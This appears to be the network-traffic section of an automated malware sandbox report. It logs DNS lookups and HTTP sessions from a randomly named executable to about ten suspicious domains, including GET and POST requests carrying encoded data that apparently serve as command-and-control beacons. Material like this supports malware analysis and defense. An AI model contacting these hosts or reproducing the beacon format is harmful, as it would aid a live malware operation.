                                                                  Jan 11, 2025 01:22:59.295790911 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:22:59.310364008 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:22:59.315274954 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101434946 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101542950 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101751089 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:00.820380926 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:01.839936972 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.825125933 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:02.825244904 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.839405060 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.845922947 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649169922 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649401903 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649452925 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:04.351871967 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.370197058 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.375649929 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:05.375756979 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.390223026 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.395090103 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:05.395349026 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191010952 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191226006 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191304922 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:06.898415089 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.917834997 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.922936916 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:07.923597097 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.933021069 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.937968969 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749007940 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749219894 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749322891 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:08.752022982 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:08.756853104 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:14.241512060 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.246409893 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.246529102 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.262600899 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.267492056 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813241005 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813318968 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813376904 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:15.773415089 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.792418957 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.797457933 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:16.797550917 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.812992096 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.817886114 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364053965 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364094973 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364166975 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:18.320481062 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.339431047 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.344374895 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.344512939 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.357899904 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.362817049 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.362987041 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915699959 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915754080 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915817022 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:20.867280960 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.886311054 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.891258001 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:21.891388893 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.900738955 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.905608892 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454224110 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454288006 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454500914 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:22.457580090 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:22.462512016 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:27.490089893 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.495019913 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:27.495626926 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.510284901 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.515237093 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090332985 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090382099 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090531111 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:29.032094002 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.043298960 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.048155069 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.048310995 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.067981958 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.072737932 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.651897907 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.652019024 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.652089119 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:31.570388079 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.590054035 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.595004082 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:32.595647097 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.615881920 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.620713949 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:32.620851994 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179502010 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179527044 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179816008 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:34.132819891 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.151714087 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.156582117 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.156723022 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.165673971 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.170502901 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.767946959 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.768054962 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.768253088 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.770869970 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.775671005 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:40.848118067 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.853387117 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:40.853502035 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.868402004 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.873229980 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311642885 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311676979 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311695099 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311917067 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:42.382868052 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.401658058 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.406465054 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.406595945 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.421920061 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.426794052 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896306038 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896328926 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896352053 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896435976 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.896481991 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:44.929687977 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.949130058 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.954070091 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:45.954185963 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.970124006 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.975002050 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:45.975241899 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408795118 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408843040 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408876896 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408936024 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:46.408984900 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:47.806957960 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.823862076 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.828711987 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:48.831653118 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.840531111 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.845371008 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286252975 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286289930 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286324024 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286428928 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.286473036 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.289197922 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.293976068 CET8050020199.59.243.228192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 11, 2025 01:21:34.800252914 CET5744953192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:21:35.289105892 CET53574491.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:21:51.183574915 CET5329253192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:21:51.442398071 CET53532921.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:22:04.636359930 CET5815953192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:22:04.897944927 CET53581591.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:22:18.636547089 CET5834053192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:22:18.647919893 CET53583401.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:22:32.199526072 CET5292453192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:22:32.251811028 CET53529241.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:22:45.777513027 CET5850653192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:22:45.788909912 CET53585061.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:22:59.277549982 CET5734253192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:22:59.288147926 CET53573421.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:23:13.761678934 CET5096653192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:23:14.238646984 CET53509661.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:23:27.465123892 CET6101953192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:23:27.487436056 CET53610191.1.1.1192.168.2.5
                                                                  Jan 11, 2025 01:23:40.777350903 CET5049453192.168.2.51.1.1.1
                                                                  Jan 11, 2025 01:23:40.845293999 CET53504941.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 11, 2025 01:21:34.800252914 CET192.168.2.51.1.1.10xe9fdStandard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:21:51.183574915 CET192.168.2.51.1.1.10x35f1Standard query (0)www.bookingservice.centerA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:04.636359930 CET192.168.2.51.1.1.10x10ecStandard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:18.636547089 CET192.168.2.51.1.1.10x5915Standard query (0)www.hm35s.topA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:32.199526072 CET192.168.2.51.1.1.10xada1Standard query (0)www.snehasfashion.shopA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:45.777513027 CET192.168.2.51.1.1.10x1139Standard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:59.277549982 CET192.168.2.51.1.1.10x2d1dStandard query (0)www.windsky.clickA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:13.761678934 CET192.168.2.51.1.1.10xe183Standard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:27.465123892 CET192.168.2.51.1.1.10x3556Standard query (0)www.moviebuff.infoA (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:40.777350903 CET192.168.2.51.1.1.10x7653Standard query (0)www.whisperart.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 11, 2025 01:21:35.289105892 CET1.1.1.1192.168.2.50xe9fdNo error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 01:21:35.289105892 CET1.1.1.1192.168.2.50xe9fdNo error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:21:51.442398071 CET1.1.1.1192.168.2.50x35f1No error (0)www.bookingservice.center98.124.224.17A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:04.897944927 CET1.1.1.1192.168.2.50x10ecNo error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:04.897944927 CET1.1.1.1192.168.2.50x10ecNo error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:18.647919893 CET1.1.1.1192.168.2.50x5915No error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:18.647919893 CET1.1.1.1192.168.2.50x5915No error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:32.251811028 CET1.1.1.1192.168.2.50xada1No error (0)www.snehasfashion.shopsnehasfashion.shopCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:32.251811028 CET1.1.1.1192.168.2.50xada1No error (0)snehasfashion.shop88.198.8.150A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:45.788909912 CET1.1.1.1192.168.2.50x1139No error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:45.788909912 CET1.1.1.1192.168.2.50x1139No error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:22:59.288147926 CET1.1.1.1192.168.2.50x2d1dNo error (0)www.windsky.click46.253.5.221A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:14.238646984 CET1.1.1.1192.168.2.50xe183No error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:14.238646984 CET1.1.1.1192.168.2.50xe183No error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:27.487436056 CET1.1.1.1192.168.2.50x3556No error (0)www.moviebuff.info209.74.77.109A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 01:23:40.845293999 CET1.1.1.1192.168.2.50x7653No error (0)www.whisperart.net199.59.243.228A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.bpgroup.site
                                                                  • www.bookingservice.center
                                                                  • www.tempatmudisini06.click
                                                                  • www.hm35s.top
                                                                  • www.snehasfashion.shop
                                                                  • www.sitioseguro.blog
                                                                  • www.windsky.click
                                                                  • www.cssa.auction
                                                                  • www.moviebuff.info
                                                                  • www.whisperart.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.54992674.48.143.82801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:21:35.589922905 CET433OUTGET /p8wp/?e6sH8=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnkRY0wlRdLQOsYcJNWRSxCeXfXL0akVDuIK46RTRxpICeg==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.bpgroup.site
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:21:36.132858992 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Sat, 11 Jan 2025 00:21:36 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                  Jan 11, 2025 01:21:36.132875919 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.54998398.124.224.17801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:21:51.465203047 CET719OUTPOST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 71 73 66 47 61 5a 65 71 42 5a 50 76 41 6b 59 6b 63 58 39 4d 46 69 5a 48 6f 51 46 41 55 34 4d 63 71 6d 53 6b 70 6f 3d
                                                                  Data Ascii: e6sH8=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXqsfGaZeqBZPvAkYkcX9MFiZHoQFAU4McqmSkpo=
                                                                  Jan 11, 2025 01:21:51.981910944 CET1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:51 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
